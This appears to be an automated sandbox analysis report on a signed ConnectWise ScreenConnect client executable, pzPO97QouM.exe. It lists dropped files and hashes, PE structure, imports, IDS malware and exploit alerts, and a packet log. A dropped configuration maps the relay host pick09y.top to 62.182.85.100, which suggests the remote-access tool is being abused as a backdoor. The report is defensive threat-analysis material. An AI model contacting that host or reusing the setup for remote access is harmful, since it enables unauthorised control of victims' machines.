                                                                                                                                                                              SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                              MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                              SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                              SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                              SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):147976
                                                                                                                                                                              Entropy (8bit):5.699150757460175
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:0aNYcT51/FXvMVNWfCXq9ymdrpErpErpXm2o9HuzhJOvP:0dcfiVITrpErpErpXmt8vOvP
                                                                                                                                                                              MD5:B7DEB98212080D0214AD779A9446FF09
                                                                                                                                                                              SHA1:05FAD5E8F0131FB5DD9D6EFA8F879E8FA684B569
                                                                                                                                                                              SHA-256:C8DC03F64AA8D794D5A763B4260C18967267B7E9C55E1BE8D0ECCF5107C9D49A
                                                                                                                                                                              SHA-512:7F93A5DF3A29312518CE188DBD72B987FD5B99DB58C4E8ACC7FF9677907B1B74F2126A6D4FD1DEF4FE136649D5690EB3EBFE739D57299C0A6E4E5EA7DB1C74E2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):87
                                                                                                                                                                              Entropy (8bit):3.463057265798253
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                              MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                              SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                              SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                              SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1590
                                                                                                                                                                              Entropy (8bit):5.363907225770245
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                                                                                                              MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                                                                                                              SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                                                                                                              SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                                                                                                              SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):556
                                                                                                                                                                              Entropy (8bit):5.042876098095699
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO+LCDzv/vXbAa3xT:2dL9hK6E46YPpz3vH
                                                                                                                                                                              MD5:4AC6371353CC59FE5C6E3319405BE7D9
                                                                                                                                                                              SHA1:14CB34BF608AC9B2F4574B67816A219BA953787D
                                                                                                                                                                              SHA-256:F0D7263254C0E2454667E262C923DE0458B26B7FFB6942E89DB544E1020A67B3
                                                                                                                                                                              SHA-512:4D1547FB53DD176906F2C0E1809E23E4D6E93BA6153BA4939179F383F26A45BC94314C88C66390340228D838034227562C16766C0722F5744731354E05508EBD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>pick09y.top=62.182.85.100-07%2f11%2f2024%2017%3a04%3a55</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                              Entropy (8bit):4.421574552833648
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:vSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNU0uhiTw:6vloTMW+EZMM6DFyu03w
                                                                                                                                                                              MD5:91AF84A906BA27C6FADCB0D43A3915D7
                                                                                                                                                                              SHA1:0010E44619FFD4F97A136BE0E3455DDF99812E83
                                                                                                                                                                              SHA-256:0830B3C722427F893FD2D4B76314B0925AE55D50390F459CB01C35C33E95D0B1
                                                                                                                                                                              SHA-512:A67B53FBBA11F4ACE2524314A70C863D66C8728F482C87026785271758475FEA1B8ED649442F5AC57C2CC3B3B4AE2B5FA3C6369C04E51E64B251ABC92C251F12
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmJ.N+71...............................................................................................................................................................................................................................................................................................................................................VY.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Entropy (8bit):6.5156988686305
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                              File name:pzPO97QouM.exe
                                                                                                                                                                              File size:83'336 bytes
                                                                                                                                                                              MD5:47891cf8a43a19e066fe70e812982c98
                                                                                                                                                                              SHA1:b2a6e75ade18f10e2d0cd709630f5e551dbcefae
                                                                                                                                                                              SHA256:fe9cb4c7eaa00078639484c209a3acf1d5195cbec55bd7981e733fb179bea899
                                                                                                                                                                              SHA512:f4294182583c2ad7697afa3ad5a2ef75adde64e72b31fb3eb120bc37cac81e4b16f98fb5e0ffdab193770ca92c54c4b0aeebd70fc7148ef49f07bf9d05a01c2c
                                                                                                                                                                              SSDEEP:1536:RoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYD70xDP:LenkyfPAwiMq0RqRfbaxZJYYDa
                                                                                                                                                                              TLSH:F4835B43B5D18875E9720E3118B1D9B4593FBE110EA48EAB3398427E0F351D19E3AE7B
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..
                                                                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                                                                              Entrypoint:0x401489
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                              OS Version Minor:1
                                                                                                                                                                              File Version Major:5
                                                                                                                                                                              File Version Minor:1
                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                              Subsystem Version Minor:1
                                                                                                                                                                              Import Hash:37d5c89163970dd3cc69230538a1b72b
                                                                                                                                                                              Signature Valid:true
                                                                                                                                                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                              Signature Validation Error:The operation completed successfully
                                                                                                                                                                              Error Number:0
                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                              • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                                                                                                              Subject Chain
                                                                                                                                                                              • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                              Version:3
                                                                                                                                                                              Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                              Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                              Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                              Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                                                                                              Instruction
                                                                                                                                                                              call 00007F64D0EFB68Ah
                                                                                                                                                                              jmp 00007F64D0EFB13Fh
                                                                                                                                                                              push ebp
                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                              push 00000000h
                                                                                                                                                                              call dword ptr [0040B048h]
                                                                                                                                                                              push dword ptr [ebp+08h]
                                                                                                                                                                              call dword ptr [0040B044h]
                                                                                                                                                                              push C0000409h
                                                                                                                                                                              call dword ptr [0040B04Ch]
                                                                                                                                                                              push eax
                                                                                                                                                                              call dword ptr [0040B050h]
                                                                                                                                                                              pop ebp
                                                                                                                                                                              ret
                                                                                                                                                                              push ebp
                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                              sub esp, 00000324h
                                                                                                                                                                              push 00000017h
                                                                                                                                                                              call dword ptr [0040B054h]
                                                                                                                                                                              test eax, eax
                                                                                                                                                                              je 00007F64D0EFB2C7h
                                                                                                                                                                              push 00000002h
                                                                                                                                                                              pop ecx
                                                                                                                                                                              int 29h
                                                                                                                                                                              mov dword ptr [004118C0h], eax
                                                                                                                                                                              mov dword ptr [004118BCh], ecx
                                                                                                                                                                              mov dword ptr [004118B8h], edx
                                                                                                                                                                              mov dword ptr [004118B4h], ebx
                                                                                                                                                                              mov dword ptr [004118B0h], esi
                                                                                                                                                                              mov dword ptr [004118ACh], edi
                                                                                                                                                                              mov word ptr [004118D8h], ss
                                                                                                                                                                              mov word ptr [004118CCh], cs
                                                                                                                                                                              mov word ptr [004118A8h], ds
                                                                                                                                                                              mov word ptr [004118A4h], es
                                                                                                                                                                              mov word ptr [004118A0h], fs
                                                                                                                                                                              mov word ptr [0041189Ch], gs
                                                                                                                                                                              pushfd
                                                                                                                                                                              pop dword ptr [004118D0h]
                                                                                                                                                                              mov eax, dword ptr [ebp+00h]
                                                                                                                                                                              mov dword ptr [004118C4h], eax
                                                                                                                                                                              mov eax, dword ptr [ebp+04h]
                                                                                                                                                                              mov dword ptr [004118C8h], eax
                                                                                                                                                                              lea eax, dword ptr [ebp+08h]
                                                                                                                                                                              mov dword ptr [004118D4h], eax
                                                                                                                                                                              mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                              mov dword ptr [00411810h], 00010001h
                                                                                                                                                                              Programming Language:
                                                                                                                                                                              • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1060c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x13000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x11800 | 0x2d88 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x14000 | 0xddc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xfe38 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xfd78 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb000 | 0x13c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9cf8 | 0x9e00 | bae4521030709e187bdbe8a34d7bf731 | False | 0.6035650712025317 | data | 6.581464957368758 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb000 | 0x5d58 | 0x5e00 | ec94ce6ebdbe57640638e0aa31d08896 | False | 0.4178025265957447 | Applesoft BASIC program data, first line number 1 | 4.843224204192078 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x11000 | 0x11cc | 0x800 | 04a548a5c04675d08166d3823a6bf61b | False | 0.16357421875 | data | 2.0120795802951505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x13000 | 0x1e0 | 0x200 | aa256780346be2e1ee49ac6d69d2faff | False | 0.52734375 | data | 4.703723272345726 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x14000 | 0xddc | 0xe00 | 908329e10a1923a3c4938a10d44237d9 | False | 0.7776227678571429 | data | 6.495696626464028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x13060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | LocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
CRYPT32.dll | CertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-07T18:04:28.554147+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.5 | 49715 | TCP
2024-11-07T18:04:28.988102+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 172.67.182.214 | 443 | 192.168.2.5 | 49717 | TCP
2024-11-07T18:04:30.684682+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 172.67.182.214 | 443 | 192.168.2.5 | 49721 | TCP
2024-11-07T18:04:35.946315+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 172.67.182.214 | 443 | 192.168.2.5 | 49742 | TCP
2024-11-07T18:04:37.828214+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 172.67.182.214 | 443 | 192.168.2.5 | 49747 | TCP
2024-11-07T18:04:40.463486+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 172.67.182.214 | 443 | 192.168.2.5 | 49757 | TCP
2024-11-07T18:04:42.302808+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 172.67.182.214 | 443 | 192.168.2.5 | 49764 | TCP
2024-11-07T18:04:48.101543+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 172.67.182.214 | 443 | 192.168.2.5 | 49795 | TCP
2024-11-07T18:04:50.623445+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 172.67.182.214 | 443 | 192.168.2.5 | 49808 | TCP
2024-11-07T18:05:06.383877+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.5 | 49897 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                              Nov 7, 2024 18:04:20.694183111 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.729017973 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.729074001 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.729075909 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.729082108 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.729104996 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.729110956 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.729334116 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.780417919 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.780428886 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.780478001 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.811805010 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.811815023 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.811861992 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.811901093 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.846317053 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.846354961 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.846405029 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.846419096 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.846446991 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.846465111 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.897413969 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.897471905 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.929363012 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.929435015 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.929444075 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.929486990 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.963041067 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.963108063 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.963691950 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.963746071 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.014395952 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.014498949 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.065457106 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.065527916 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.080178976 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.080245018 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.080418110 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.080471992 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.131604910 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.131642103 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.131688118 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.131702900 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.131716013 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.135011911 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.182311058 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.182398081 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.197309017 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.197387934 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.197556973 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.197619915 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.248470068 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.248568058 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.248577118 CET49705443192.168.2.5172.67.182.214
